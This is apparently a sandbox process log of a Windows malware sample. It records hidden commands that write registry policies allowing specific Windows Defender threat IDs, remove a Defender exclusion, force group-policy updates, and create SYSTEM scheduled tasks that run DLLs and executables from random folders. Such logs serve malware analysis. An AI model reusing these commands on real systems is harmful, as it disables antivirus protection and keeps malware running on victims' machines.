C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\AIbtiD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 07:11:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe\" 0c /NtCpdidbZ 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe 0c /NtCpdidbZ 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7076 -ip 7076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 664

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\NaYLMLk.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\CwCgEqZ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\JzIzyJL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\NFisFjC.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\aOMPEVQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 11:56:35 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\TNDmeeBP\dWbUkGN.dll\",#1 /NrpdidV 385118" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\TNDmeeBP\dWbUkGN.dll",#1 /NrpdidV 385118

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\TNDmeeBP\dWbUkGN.dll",#1 /NrpdidV 385118

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qrBXK1" /SC once /ST 06:54:08 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "qrBXK1"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb733d46f8,0x7ffb733d4708,0x7ffb733d4718

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,16089594077116985658,4366073024503587701,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1880,16089594077116985658,4366073024503587701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,16089594077116985658,4366073024503587701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2996 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,16089594077116985658,4366073024503587701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1880,16089594077116985658,4366073024503587701,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3132 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,16089594077116985658,4366073024503587701,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,16089594077116985658,4366073024503587701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1880,16089594077116985658,4366073024503587701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

